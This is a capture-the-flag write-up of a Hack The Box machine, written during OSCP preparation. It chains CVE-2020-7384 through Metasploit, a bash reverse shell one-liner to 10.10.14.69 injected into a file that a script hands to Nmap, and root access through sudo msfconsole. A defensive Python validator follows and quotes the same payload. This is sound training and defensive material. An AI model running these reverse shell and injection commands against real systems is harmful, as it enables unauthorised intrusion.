I am in the midst of my pursuit of the Offensive Security Certified Professional (OSCP) certification in May. Part of my preparation is to take on machines available on the Hack The Box (HTB) platform. HTB is a great platform for practising and learning new penetration testing skills, as well as for taking on the challenge of "capturing the flag" on its machines.

Yet another box!

Reconnaissance

My first step was to run an Nmap scan:

nmap -Pn -sC -sV -oN initial 10.10.10.226

These were the results:

Scanning and Enumeration

Seeing port 5000 was open, I visited it and was greeted with this page:

There were 3 tools on the page: Nmap, MsfVenom and Searchsploit. They all worked as per usual. Realising I was getting nowhere, I started Googling about vulnerabilities these tools may have and stumbled upon CVE-2020-7384: MsfVenom APK template command injection.

Exploitation

I quickly fired up MsfConsole and used exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection with the following options:

I fired up a Netcat listener to catch any incoming shells: nc -nlvp 4444. Then, I uploaded the malicious template that I just generated to the website with the following options:

Gaining Access

Upon hitting generate, I was greeted with a shell on Netcat. I then upgraded my shell using Python and grabbed the user flag:

Then, I generated a pair of SSH keys and placed the public key on the remote machine. This was to stabilise my connection and access the machine with SSH:

Scanning and Enumeration [2]

After enumerating the machine, I found another user, pwn, and a script in that user's home directory. Analysing the script, I realised that Nmap was being run against the entries of a file called hackers.

Exploitation & Gaining Access [2]

I fired up another Netcat listener to catch any incoming shells and used a bash script to run a reverse shell to access the pwn user account:

echo "HRI ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1' #" >> hackers

And it worked!
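The hackers file worked as an injection point because its contents reached a shell unchecked. The following is an added defensive illustration, not the box's script or the author's code: it assumes the scanner script reads targets from that file one per line, validates each entry as a bare IP address or DNS hostname, rejects anything else (shell metacharacters and option-looking entries alike), and builds an argv list for Nmap so no shell ever interprets the data.

```python
import ipaddress
import re
import shlex

# Constructed sample of a "hackers" file: two legitimate entries, the injected
# line from the write-up, and an option-looking entry that would be argument
# injection if the file were passed straight to nmap.
SAMPLE_HACKERS = """10.10.14.5
scanner.example.net
HRI ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.69/4444 0>&1' #
-oN /tmp/out
"""

# One DNS label: alphanumerics and hyphens, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

def is_valid_target(entry: str) -> bool:
    """Accept only a literal IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(entry)
        return True
    except ValueError:
        pass
    if not entry or len(entry) > 253:
        return False
    return all(LABEL_RE.match(label) for label in entry.split("."))

def split_targets(text: str):
    """Return (accepted, rejected) entries from the raw file contents."""
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line:
            (accepted if is_valid_target(line) else rejected).append(line)
    return accepted, rejected

def build_nmap_argv(targets):
    """argv for subprocess.run(argv) with shell=False; -sn is an assumed option."""
    return ["nmap", "-sn", *targets]

if __name__ == "__main__":
    ok, bad = split_targets(SAMPLE_HACKERS)
    for entry in bad:
        print(f"rejected entry (not an IP or hostname): {entry!r}")
    print("would run:", shlex.join(build_nmap_argv(ok)))
```

Logging the rejected entries is the detection hook: a reverse-shell one-liner landing in a file that should only hold hostnames is a signal worth alerting on.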

Next, I checked the permissions this user had and realised that it could run MsfConsole as root without a password.

Thus, I ran sudo msfconsole, used the command /bin/bash to open a shell and found the root hash!

It was a fun box! On to the next one 😃